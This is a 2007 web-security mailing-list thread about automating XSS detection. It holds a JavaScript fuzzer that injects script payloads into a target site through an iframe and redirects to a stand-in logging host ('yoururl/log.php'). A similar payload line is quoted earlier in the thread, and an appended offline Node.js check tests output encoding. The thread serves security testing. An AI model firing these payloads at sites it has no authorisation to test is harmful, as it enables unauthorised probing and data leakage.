
RE: [WEB SECURITY] How to detect XSS in an automated fashion



Basically the idea is you fuzz the various dangerous inputs on a 
site, e.g. ">' etc., then you place a tag, {log}, within your commands 
which gets replaced by JavaScript to execute a log of the results. 
You might have to use different logging code depending on the fuzz 
data used.

Here's a simple example I wrote in a couple of minutes to explain 
my theory:-

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>XSS Fuzz</title>
<script type="text/javascript">
window.onload = function() {
	xssFuzzer.setFrame('iframe');
	xssFuzzer.setURL('http://www.google.com/search?');
	for(var i=0;i<1;i++) {
		// Fuzzing code here: each iteration sets the fuzz data (with a {log}
		// placeholder), the logger code that replaces it, and sends the request
		xssFuzzer.setCommands('q=test{log}');
		xssFuzzer.setLogger("<scr"+"ipt>self.location='http://yoururl/log.php?results="+xssFuzzer.getResult()+"'</scr"+"ipt>");
		xssFuzzer.send();
	}
}
var xssFuzzer = {frame:null,url:null,loggerCode:null,commands:null};
xssFuzzer.setCommands = function(commands) {
	this.commands = commands;
}
// The value the logger reports back: the fuzz data without the
// placeholder, base64 encoded so it survives the URL
xssFuzzer.getResult = function() {
	var commands = this.commands.replace("{log}", '');
	return encode64(commands);
}
xssFuzzer.setFrame = function (frame) {
	this.frame = frame;
}
xssFuzzer.setURL = function(url) {
	this.url = url;
}
xssFuzzer.getLogger = function() {
	return this.loggerCode;
}
xssFuzzer.setLogger = function(loggerCode) {
	this.loggerCode = loggerCode;
}
xssFuzzer.send = function() {
	// Substitute the logger code for {log} and load the result in the target frame
	var commands = this.commands.replace("{log}", this.getLogger());
	window.frames[this.frame].location = this.url + commands;
}
var keyStr = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

// Minimal base64 encoder for single-byte character strings
function encode64(input) {
   var output = "";
   var chr1, chr2, chr3;
   var enc1, enc2, enc3, enc4;
   var i = 0;

   do {
	  chr1 = input.charCodeAt(i++);
	  chr2 = input.charCodeAt(i++);
	  chr3 = input.charCodeAt(i++);

	  enc1 = chr1 >> 2;
	  enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
	  enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
	  enc4 = chr3 & 63;

	  // Pad with '=' when the input length is not a multiple of three
	  if (isNaN(chr2)) {
		 enc3 = enc4 = 64;
	  } else if (isNaN(chr3)) {
		 enc4 = 64;
	  }

	  output = output + keyStr.charAt(enc1) + keyStr.charAt(enc2) + 
		 keyStr.charAt(enc3) + keyStr.charAt(enc4);
   } while (i < input.length);
   
   return output;
}

</script>
</head>

<body>
<iframe src="" name="iframe" id="iframe"></iframe>
</body>
</html>
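An added example, not from Gareth's mail or his fuzzer: the other approach raised in the thread is to review the response source for the fuzz data, and this Node.js block shows what that check looks like when run offline against constructed stand-in page handlers (one that output-encodes, one that reflects raw, one that strips only angle brackets, and one that drops the input). The marker string, the handler names and the scan/classifyReflection functions are constructed for this example; the metacharacters are the ones the mail fuzzes with.

```javascript
// Added example (not code from the original mail): an offline version of the
// "review the response source" check. A probe (unique marker + metacharacters +
// marker) is passed through constructed stand-in handlers and the response is
// inspected to see which metacharacters came back unencoded.

const CANARY = 'zq7x';                   // constructed marker, unlikely to occur naturally
const METACHARS = ['"', "'", '<', '>'];  // the characters the mail fuzzes with

// Marker on both sides lets us locate the reflected span and see what survived.
function buildProbe(canary = CANARY) {
  return canary + METACHARS.join('') + canary;
}

// What a correctly encoding handler does with untrusted text in HTML.
function htmlEscape(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// Constructed stand-ins for a server answering ?q=<probe>.
const handlers = {
  // output-encodes: the probe is visible in the page but inert
  escaped:  q => `<html><body><p>Results for ${htmlEscape(q)}</p></body></html>`,
  // reflects verbatim into text context
  raw:      q => `<html><body><p>Results for ${q}</p></body></html>`,
  // strips angle brackets only; inside an attribute the quotes still matter
  tagsOnly: q => `<html><body><input name="q" value="${q.replace(/[<>]/g, '')}"></body></html>`,
  // never reflects the input at all
  dropped:  () => '<html><body><p>No results.</p></body></html>',
};

// Find every reflected span between two markers and report which
// metacharacters are present there intact.
// Returns { reflected: boolean, unencoded: string[] }.
function classifyReflection(body, canary = CANARY) {
  const re = new RegExp(canary + '([\\s\\S]*?)' + canary, 'g');
  const survived = new Set();
  let reflected = false;
  let m;
  while ((m = re.exec(body)) !== null) {
    reflected = true;
    for (const c of METACHARS) {
      if (m[1].includes(c)) survived.add(c);
    }
  }
  return { reflected, unencoded: METACHARS.filter(c => survived.has(c)) };
}

// Send the probe through one handler and classify its response.
function scan(handler) {
  return classifyReflection(handler(buildProbe()));
}

// One-line verdict for a report.
function verdict(result) {
  if (!result.reflected) return 'not reflected';
  if (result.unencoded.length === 0) return 'reflected, encoded';
  return 'reflected unencoded: ' + result.unencoded.join(' ');
}

for (const [name, handler] of Object.entries(handlers)) {
  console.log(name.padEnd(9), verdict(scan(handler)));
}
```

Running it prints one verdict per handler. The source check reports which characters survived the application's encoding, not whether a browser would execute the result, which is Billy's point about needing a JavaScript interpreter and the reason the mail moves the check into an iframe. Read the other way, the same check is a regression test for output encoding: the escaped handler is the behaviour a fixed page should show, and the tagsOnly handler shows why a filter that only removes angle brackets still fails in attribute context.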


On Thu, 30 Aug 2007 02:42:12 +0100 gaz_sec@xxxxxxxxxxxx wrote:
>I've thought about an XSS fuzzer a bit more now, you'll have to 
>excuse me but it's 2.30am here :) Right the best way to do it in my 
>opinion is:-
>
>1. Base site contains an iframe with the target site in.
>2. The base site sends XSS fuzz to the target site through 
>javascript location.
>3. The fuzzer contains javascript code to log the results back to a 
>server side script. E.g. 
><script>self.location='http://yoursite.com?logresults?fuzzResult=FuzzBaseEncoded'</script>
>
>
>On Thu, 30 Aug 2007 01:48:29 +0100 Billy Hoffman 
><Billy.Hoffman@xxxxxxxxxxxxxxx> wrote:
>>Of course, that only works if your web scanner has a JavaScript 
>>interpreter!
>>
>>Billy
>>
>>-----Original Message-----
>>From: gaz_sec@xxxxxxxxxxxx [mailto:gaz_sec@xxxxxxxxxxxx]
>>Sent: Wed 8/29/2007 3:03 PM
>>To: websecurity@xxxxxxxxxxxxx
>>Cc: travisaltman@xxxxxxxxx
>>Subject: Re: [WEB SECURITY] How to detect XSS in an automated fashion
>> 
>>Hi Travis
>>
>>I've written an HTML/JS fuzzer in which I encountered the same 
>>problem. I decided to create a simple javascript callback which was 
>>executed on successful fuzz. I base encoded the result and sent the 
>>information via a normal HTML image (really a PHP script) which 
>>logged the results.
>>
>>Cheers
>>
>>Gareth
>>
>>On Wed, 29 Aug 2007 19:22:22 +0100 Travis Altman 
>><travisaltman@xxxxxxxxx> wrote:
>>>I am trying to run through a dictionary of XSS attacks (aka 
>>>fuzzing) on a web application.  What is the best way to determine, 
>>>in an automated fashion, if each attack was successful?  Would I 
>>>simply review the source code of the response to see if my attack 
>>>was encoded or filtered?
>>>
>>>http://travisaltman.com
>>
>



----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]



Brought to you by http://www.webappsec.org